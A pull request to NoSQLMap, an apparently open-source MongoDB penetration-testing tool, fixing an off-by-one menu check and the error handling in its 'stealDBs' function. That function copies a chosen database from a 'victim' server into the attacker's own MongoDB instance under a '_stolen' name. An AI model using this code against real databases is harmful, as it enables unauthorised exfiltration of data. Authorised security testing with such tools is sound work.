### PR TITLE
fix a little bug of logic

### DIFF
--- a/nosqlmap.py
+++ b/nosqlmap.py
@@ -93,7 +93,7 @@ def mainMenu():
 			options()
 
 		elif select == "2":
-			if optionSet[0] == True:
+			if optionSet[0] == True and optionSet[4] == True:
 				if platform == "MongoDB":
 					nsmmongo.netAttacks(victim, dbPort, myIP, myPort)
 

--- a/nsmmongo.py
+++ b/nsmmongo.py
@@ -186,11 +186,11 @@ def stealDBs(myDB,victim,mongoConn):
 			return
 
 	except Exception, e:
-#		print str(e)
 		if str(e).find('text search not enabled') != -1:
 			raw_input("Database copied, but text indexing was not enabled on the target.  Indexes not moved.  Press enter to return...")
 			return
-
+		elif str(e).find('Network is unreachable') != -1:
+			raw_input("Are you sure your network is unreachable? Press enter to return..")
 		else:
 			raw_input ("Something went wrong.  Are you sure your MongoDB is running and options are set? Press enter to return...")
 			return

--- a/nsmmongo.py
+++ b/nsmmongo.py
@@ -163,9 +163,9 @@ def stealDBs(myDB,victim,mongoConn):
 	try:
 		#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
 		dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
-
+		myDBConn = pymongo.MongoClient(myDB, 27017)
 		if dbNeedCreds in no_tag:
-			myDBConn = pymongo.MongoClient(myDB,27017)
+
 			myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
 
 		elif dbNeedCreds in yes_tag:
@@ -186,6 +186,7 @@ def stealDBs(myDB,victim,mongoConn):
 			return
 
 	except Exception, e:
+#		print str(e)
 		if str(e).find('text search not enabled') != -1:
 			raw_input("Database copied, but text indexing was not enabled on the target.  Indexes not moved.  Press enter to return...")
 			return

--- a/nsmmongo.py
+++ b/nsmmongo.py
@@ -154,7 +154,7 @@ def stealDBs(myDB,victim,mongoConn):
 	while dbLoot:
 		dbLoot = raw_input("Select a database to steal: ")
 
-		if int(dbLoot) > menuItem:
+		if int(dbLoot) >= menuItem:
 			print "Invalid selection."
 
 		else:


### PR DESCRIPTION
operator ''>'' should be replace with ''>=' in 157 line number  in nsmmongo.py
**Describtion** when user select a database to steal, there is a bug if user enter database number equal to the account of database plus one 
**leak test:**
1-local
2-VASTTEST
3-admin
Select a database to steal: 56
Invalid selection.
Select a database to steal: 23
Invalid selection.
Select a database to steal: 4
Does this database require credentials (y/n)? 

**4 is a invalid number, but system accept it** 